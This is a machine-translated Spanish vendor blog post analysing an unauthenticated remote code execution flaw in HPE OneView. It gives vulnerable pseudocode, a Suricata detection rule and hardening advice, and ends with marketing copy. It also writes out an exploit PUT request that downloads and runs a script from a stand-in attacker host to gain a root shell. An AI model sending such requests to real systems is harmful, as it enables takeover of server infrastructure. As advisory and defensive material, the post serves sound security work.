Cabecera Penligente

La toma de control de Silicon: Autopsia de CVE-2025-37164 (HPE OneView) y el colapso de la seguridad informática de la IA

En la floreciente era de 2026, en la que "la informática es el nuevo petróleo", la seguridad del centro de datos físico nunca ha sido tan crítica. Mientras los equipos rojos se pasan semanas elaborando inyecciones rápidas para saltarse las barreras de seguridad de LLM, una amenaza mucho más primitiva y devastadora ha surgido del sótano de la pila de TI.

El 16 de diciembre de 2025, el mundo de la seguridad se vio sacudido por la revelación de CVE-2025-37164una vulnerabilidad en HPE OneView llevando el raro y aterrador Puntuación CVSS de 10,0.

Para los no iniciados, HPE OneView es el software "Modo Dios" para la infraestructura definida por software (IDE) moderna. Automatiza el aprovisionamiento de miles de servidores HPE Synergy y ProLiant, las mismas bestias bare-metal que alimentan los clústeres de entrenamiento de IA más avanzados del mundo.

CVE-2025-37164 es un Ejecución remota de código no autenticada (RCE) vulnerabilidad. Permite a cualquier atacante con acceso de red al puerto de gestión ejecutar comandos arbitrarios del sistema como root, entregando efectivamente las llaves de toda la flota física. Este artículo abandona el resumen de alto nivel para realizar una disección quirúrgica del fallo de la API y sus implicaciones para la ingeniería de seguridad de la IA.

La toma de control de Silicon: Autopsia de CVE-2025-37164 (HPE OneView) y el colapso de la seguridad informática de la IA

La arquitectura de una vulnerabilidad "Modo Dios

Para comprender la gravedad de este fallo, hay que entender el papel de OneView. Se sitúa por encima de las interfaces BMC (Baseboard Management Controller) e iLO (Integrated Lights-Out), agregando el control sobre los tejidos de computación, almacenamiento y red.

La vulnerabilidad reside en un punto final específico de la API REST: /rest/id-pools/ejecutarComando.

1. La catástrofe de la configuración

En el diseño de API seguras, los puntos finales capaces de ejecutar comandos del sistema deben estar protegidos por múltiples capas: Autenticación (OAuth/Sesión), Autorización (RBAC), y Sanitización de Entrada.

En las versiones afectadas de OneView (anteriores a 11.0), la definición de punto final para ejecutarComando sufrió un error de configuración catastrófico. El mapa del filtro de seguridad interno marcó esta ruta con auth-type: NO_AUTH.

Lógica hipotética del backend (Pseudocódigo Java/Spring):

Java

`@RestController @RequestMapping("/rest/id-pools") public class IdPoolController {

// FATAL FLAW: Falta @PreAuthorize("isAuthenticated()")
// Este endpoint probablemente estaba destinado a la comunicación interna entre servicios
// pero fue expuesto a la interfaz pública.
@PutMapping("/ejecutarComando")
public ResponseEntity execute(@RequestBody CommandRequest payload) {
    
    String binary = payload.getCommand();
    String[] args = payload.getArgs();
    
    // FATAL FLAW: Inyección directa en ProcessBuilder sin sanitización
    ProcessBuilder pb = new ProcessBuilder(binary);
    pb.command().addAll(Arrays.asList(args));
    Proceso proceso = pb.start();
    
    return ResponseEntity.ok(readOutput(process));
}

}`

Esta lógica crea un túnel directo desde una petición HTTP al núcleo Linux del dispositivo.

La toma de control de Silicon: Autopsia de CVE-2025-37164 (HPE OneView) y el colapso de la seguridad informática de la IA

2. Deconstruir la cadena de muerte

La complejidad de la explotación es Bajo. No hay corrupción de memoria que masajear, ni ASLR que saltarse, ni condición de carrera que ganar. Es una falla lógica pura y simple.

La explotación primitiva:

Un atacante envía una petición PUT. La carga útil es un objeto JSON que define el comando a ejecutar.

HTTP

`PUT /rest/id-pools/executeCommand HTTP/1.1 Host: oneview-appliance.local Content-Type: application/json

{ "command": "/bin/sh", "args": ["-c", "wget http://c2.attacker.com/payload.sh -O /tmp/x; chmod +x /tmp/x; /tmp/x"]. }`

El resultado:

El dispositivo ejecuta el script. El atacante recibe un shell inverso con privilegios de root. A partir de aquí, tienen persistencia en el propio controlador de red.

El panorama de las amenazas a la infraestructura de IA

¿Por qué es esto específico para el "ingeniero de seguridad de IA hardcore"? Porque la infraestructura de IA es especialmente vulnerable a este tipo de ataque.

1. El atraco a la GPU (secuestro y robo de criptomonedas)

Los clusters de entrenamiento de IA utilizan GPUs H100/B200, que son increíblemente valiosas. Un atacante con acceso root a OneView puede:

  • Aprovisionamiento de cargas de trabajo no autorizadas: Gire máquinas virtuales ocultas en el metal desnudo para minar criptomoneda, desviando megavatios de energía y capacidad de refrigeración.
  • Denegación de recursos: Durante un entrenamiento crítico (que puede costar millones), el atacante puede emitir un apagar a los blades físicos a través de la interfaz iLO, provocando pérdidas de datos catastróficas y retrasos en los proyectos.

2. Envenenamiento de la cadena de suministro mediante firmware

OneView gestiona las actualizaciones de firmware para la flota de servidores. Un atacante con acceso root puede:

  • Flash Firmware Malicioso: Downgrade BIOS/UEFI a versiones vulnerables o implantar rootkits persistentes (como BlackLotus) en la flash SPI de los servidores AI.
  • Acceso persistente: Aunque se borre el sistema operativo y se vuelva a instalar, el malware sobrevive en el hardware, comprometiendo todos los modelos futuros que se formen en esa máquina.

3. Movimiento lateral hacia los lagos de datos

Los clústeres de IA de alto rendimiento están estrechamente acoplados a los tejidos de almacenamiento (Infiniband/RoCE). OneView gestiona estas conexiones. La vulneración de OneView permite a un atacante montar los volúmenes NAS/SAN subyacentes, lo que garantiza el acceso directo a conjuntos de datos propietarios y pesos de modelos sin tocar en ningún momento la red AD corporativa.

Defensa basada en IA: La ventaja de la negligencia

La detección de vulnerabilidades de infraestructura como CVE-2025-37164 es un punto ciego para los escáneres de aplicaciones web tradicionales (DAST). Las herramientas DAST rastrean HTML; rara vez sondean API de gestión oscuras en puertos no estándar.

Aquí es donde Penligent.ai representa un cambio de paradigma para la seguridad de las infraestructuras.

1. Cartografía de activos fuera de banda (OOB)

Los agentes de IA de Penligent utilizan Mapa completo de activos. No se limitan a buscar aplicaciones web, sino que escuchan activamente las firmas de protocolos de gestión (IPMI, Redfish, HPE REST API). La IA correlaciona estas firmas con la inteligencia de amenazas más reciente, identificando la "infraestructura en la sombra" que el departamento de TI olvidó parchear.

2. Verificación RCE no destructiva

Escanear un cluster de producción de IA es arriesgado. Un escaneado incorrecto puede bloquear un servidor. Penligent utiliza Fuzzing consciente del contexto para realizar una verificación no destructiva.

  • Carga útil segura: En lugar de enviar rm -rf / o una shell inversa, Penligent envía una carga útil benigna como echo "Penligent_Check".
  • Validación: La IA analiza la respuesta HTTP. Si ve la cadena con eco, confirma el RCE con una certeza de 100%, lo que permite al equipo de seguridad priorizar el parche sin bloquear el trabajo de formación.

Manual del Equipo Azul: Detección y endurecimiento

Si no puede parchear inmediatamente, se encuentra en un estado de "Brecha Asumida".

1. Detección de redes (Suricata/Snort)

Monitorice el tráfico a la subred de gestión de OneView. Busque HTTP PUT o POST solicita a /rest/id-pools/ejecutarComando.

Regla Suricata:

YAML

alert http $EXTERNAL_NET any -> $ONEVIEW_SERVER 443 (msg: "ET EXPLOIT HPE OneView CVE-2025-37164 RCE Attempt"; \\ flow:established,to_server; \ content:"/rest/id-pools/executeCommand"; http_uri; \ content: "command"; http_client_body; \ content:"/bin/"; http_client_body; \ classtype:attempted-admin; sid:1000025; rev:1;)

2. Auditoría de registros

Compruebe los registros de auditoría de OneView (ci-debug.log o registro.auditoría) para llamadas inesperadas al IdPools que se originan en direcciones IP que no son el host de bastión designado.

3. Cuarentena arquitectónica

  • VLAN de gestión: Asegúrese de que la interfaz del dispositivo OneView está en una VLAN estrictamente aislada, accesible sólo a través de una VPN con MFA.
  • ACL: Aplique Listas de Control de Acceso a nivel de switch para bloquear todo el tráfico al puerto 443 en el dispositivo OneView, excepto desde la IP específica de la estación de trabajo del administrador del sistema.

Conclusión

CVE-2025-37164 sirve como brutal recordatorio de que la "Nube" no es más que el ordenador de otra persona, y ese ordenador tiene un puerto de gestión. En la prisa por construir la AGI, no debemos descuidar los cimientos de hormigón sobre los que se asienta.

La seguridad del futuro de la IA no sólo depende de una sólida alineación de modelos, sino de la integridad de la cadena de suministro de silicio. Actualice su firmware, aísle sus planos de gestión y emplee una validación inteligente y automatizada para garantizar que su consola de "Modo Dios" no se convierta en el patio de recreo de un atacante.

Referencias fiables

🚀 Opciones CTA

Opción 1 (Punto de dolor - Recomendado):

¿Su escáner DAST es ciego a las API de gestión? Penligent no.

Deje de ignorar su infraestructura. Detecte RCE ocultos en su clúster informático de IA con Penligent hoy mismo.

Opción 2 (Urgencia):

No dejes que un error del "Modo Dios" acabe con tus modelos de IA.

Valide su postura de seguridad de HPE OneView al instante con las pruebas no destructivas de Penligent.

Comparte el post:
Entradas relacionadas
es_ESSpanish